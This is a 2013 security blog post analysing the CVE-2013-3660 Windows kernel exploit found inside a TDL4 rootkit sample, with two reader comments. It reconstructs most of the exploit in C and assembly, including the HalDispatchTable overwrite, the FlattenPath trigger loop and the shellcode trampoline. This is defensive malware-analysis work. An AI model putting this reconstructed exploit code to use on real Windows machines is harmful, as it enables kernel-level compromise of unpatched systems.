Skip to content
October 22, 2013 / Vadim Kotov

The latest TDL4 and CVE-2013-3660 exploit enhancements

As a wise man once said, there’s never a dull moment in the security industry. As the world was talking about the recent IE zero day which was doing its rounds, we encountered a variant of the infamous TDL4 rootkit (MD5 = 0e35e0e63fc208873792dd0b7afa90e7) that was rumored to be using kernel exploit code available publicly earlier this year. We would like to reiterate that earlier at Bromium Labs we had warned that kernel exploits are a huge problem for lot of security products.

We reverse engineered and extracted the exploit code from the TDL4 malware sample – to our surprise, we discovered that the public assumption is not entirely true. There are some crucial differences between the public code and the TDL4 version. Unlike its public counterpart this exploit takes advantage of the CVE-2013-3660 vulnerability in a more straightforward manner. Before diving into the article, it is recommended to read the detailed analysis of the vulnerability and familiarize you with the public exploit code.

Now let’s get through the exploitation steps used in the TDL4 sample. We restored the source code of the exploit and when applicable, named the variables after its counterparts in the public exploit.

Before actual exploitation the TDL4 exploit resolves the necessary routines and addresses such as NtQueryIntervalProfile and HalDispatchTable. In order to trigger the payload the exploit requires a chunk of data that has both a valid memory address and a pointer. TDL4 authors used the same trick as the public exploit, but changed the opcodes a little bit (further this routine is referenced as DispatchRedirect):

jmp dword ptr [ebp+0x40]
inc eax
jmp dword ptr [ebp+0x40]
inc ecx
jmp dword ptr [ebp+0x40]
inc edx
jmp dword ptr [ebp+0x40]
inc ebx
jmp dword ptr [ebp+0x40]
inc esi
…

This sequence of instructions can be represented as an array of 4-byte numbers: 0x404065FF, 0x414065FF, 0x424064FF etc. The exploit then makes the first doubleword a legit pointer by calling VirtualAlloc:

VirtualAlloc((*DispatchRedirect)&0xFFFFF000,
              0x2000,
              MEM_COMMIT | MEM_RESERVE,
              PAGE_EXECUTE_READWRITE);

This commits the memory starting at 0x40400000 making an opcode sequence 0xFF 0x65 0x40 0x40 a valid pointer. After it’s done, the exploit sets up three instances of the PATHRECORD structures. This is the main difference from the public exploit code:

ExploitRecordExit = (PPATHRECORD) *DispatchRedirect;
ExploitRecordExit->next = NULL;
ExploitRecordExit->prev = NULL;
ExploitRecordExit->flags = 1;
ExploitRecordExit->count = 0;

ExploitRecord.next = ExploitRecordExit;
ExploitRecord.prev = (PPATHRECORD) &HalDispatchTable[1];
ExploitRecord.flags = 0x11;
ExploitRecord.count = 4;

PathRecord = VirtualAlloc(NULL, 0x30,
                          MEM_COMMIT|MEM_RESERVE,
                          PAGE_EXECUTE_READWRITE);
memset(PathRecord, 0x90, 0x30);

PathRecord->next = &ExploitRecord;
PathRecord->prev = NULL;
PathRecord->flags = 0;

At this point we have the following layout:

Layout of PATHRECORD structures

The PATHRECORD instances are organized in such a manner that when the vulnerability is triggered nt!HalDispatchTable+0x4 will be patched by the address of ExploitRecordExit. Let’s look at the details of the vulnerability. If we put a write breakpoint on HalDispatchTable[1], the program will pause in the middle of pprFlattenRec:

kd> ba w 1 nt!HalDispatchTable+0x4
kd> g
Breakpoint 0 hit win32k!EPATHOBJ::pprFlattenRec+0x60

Tracing back the program workflow we can see, that pprFlattenRec creates new PATHRECORD using win32k!EPATHOBJ::newpathrec and moves it to ESI. The ExploitRecord (that we controlled) is placed at EDI:

…
mov esi,dword ptr [ebp-4] ; ESI = NewPathRec
… 
mov edi,dword ptr [ebp+8] ; EDI = ExploitRecord
mov eax,dword ptr [edi+4] ; EAX = ExploitRecord.prev
mov dword ptr [esi+4],eax ; NewPathRec.prev = ExploitRecord.prev
…

After some manipulation with count and flags members the following code is executed:

…
mov eax, dword ptr [esi+4] ;; EAX = HalDispatchTable+4
mov dword ptr [eax],esi ;; Patch HalDispatchTable+4!

At this point we have HalDispatchTable+4 containing address of NewPathRec. The next pointer is initialized to zero here and later in the function it receives the next pointer of ExploitRecord, i.e. ExploitRecordExit:

…
mov edi, dword ptr[edi] ; EDI points at ExploitRecordExit.next
mov dword ptr[esi], edi ; NewPathRec.next = 0x404065FF
…

So HalDispatchTable+4 points at the valid sequence of opcodes. This conditions allows us to trigger the shellcode by calling NtQueryIntervalProfile, which at some point calls nt!HalDispatchTable+4 .

Now let’s look at how the vulnerability condition is triggered. Similar to the public exploit, the TDL variant generates a huge number of Point objects:

for(PointNum = 0; PointNum < 0x7C80; PointNum++)
{
    Points[PointNum].x = (ULONG)(PathRecord)>>4;
    Points[PointNum].y = (ULONG)(PathRecord)>>4;
    PointTypes[PointNum] = 4;
}

Next, it enters the 5-step loop, where the actual exploitation occurs. First, it draws the curves using the Points array and creates a compatible device context:

if(hdc == NULL)
{
    BeginPath(Device);
    PolyDraw(Device, Points, PointTypes, 0x1F2);
    EndPath(Device);
    BeginPath(Device);
    PolyDraw(Device, Points, PointTypes, 0x1E3);
    EndPath(Device);
    hdc = CreateCompatibleDC(Device);
}

Now the curves are drawn, it calls the vulnerable function FlattenPath. But before that it creates some memory pressure (calling CauseFailure()) and then cleans up the created objects.

BeginPath(hdc);
if( !PolyDraw(hdc, Points, PointTypes, PointNum*0x1F2) )
{
    EndPath(hdc);
}
else
{
    EndPath(hdc);
    CauseFailure();
    FlattenPath(Device);
    Cleanup();
    FlattenPath(Device);

    lpAddress = VirtualAlloc(NULL, 5,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    *lpAddress = 0xE9;
    *(DWORD *)(lpAddress+1) = (DWORD)(ShellCode) - (DWORD)(lpAddress) - 5;
    NtQueryIntervalProfile(2, (PULONG)lpAddress);
    VirtualFree(lpAddress, 0, 0x8000);

    if(Finished)break;

    DeleteDC(hdc);
    hdc = NULL;
    Sleep(0x64)
}

The lpAddress variable is a buffer which is used as a trampoline to jump to the shellcode. It writes 0xE9 followed by [ShellCodeAddress – lpAddress – 5], which is “jmp ShellCode” instruction. The shellcode execution is triggered using NtQueryIntervalProfile. At this moment the nt!HalDispatchTable+0x4 points at 0x404065FF, which, translated to processor instructions, gives us jmp [ebp+0x40], inc eax. The jump leads to the shellcode trampoline, which, on its turn launches the actual shellcode.

The CauseFailure function repetitively calls CreateCompatibleBitmap for the in-memory device context. RegionSize is a global variable initialized to 0.

void CauseFailure()
{
    HDC hdc;
    int Size;

    NumRegion = 0;
    hdc = CreateCompatibleDC(NULL);
    for(Size=0x400000; Size; Size>>=2)
    {
        while(Regions[NumRegion] = CreateCompatibleBitmap(hdc, Size, Size))
        {
            NumRegion++;
            if(NumRegion>=RegionSize)
            {
                RegionSize*=2;
                Regions = realloc(Regions, RegionSize*4);
            }
        }
    }
}

Then Cleanup simply removes all the objects created:

void Cleanup()
{
    while(NumRegion--)
    {
        DeleteObject(Regions[NumRegion]);
    }
}

Altogether it provides a remarkably stable way to run the payload from kernel space. We observed almost 100% stability on Windows 7+ of this exploit, however sometimes crashes are possible, especially in the case of repetitive uses. The TDL4 sample makes 2 attempts to exploit the system, but in most cases one is enough.

In short, this version of CVE-2013-3660 exploit embedded in TDL is far more lethal than the public exploit code and further exploitation of this issue is likely.

2 Comments

Leave a Comment
  1. Jared DeMott / Oct 31 2013 4:49 am

    I like this quote from the original write-up: “It turns out, getting an object from the freelist happens quite rarely, so the few cases that don’t initialize their path object have survived over 20 years in NT.” — If the data there is reliable, makes me wonder how many other bugs are that old and can survive that long?

  2. Jared DeMott / Oct 31 2013 6:24 am

    One of the other things that’s interesting: I recall a time when kernel exploitation was like dark black magic that very few understood. Nowadays, that doesn’t seem to be as true. That shift has probably happened for a few reasons:
    1. “Normal” browser exploitation is now just as, if not more, complicated — because of all the modern protections. And actually, I see a lot of similarities. Via java scripting and RWX bugs, there’s a need to know the location, setup memory, etc for exploitation — in both browser and kernel bugs.
    2. Kernel exploitation is a preferred (in some cases necessary) way to escape sandboxes.
    3. “Typical” (lol – no not grandma) exploit writer abilities have caught up to the ability of kernel exploitation.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: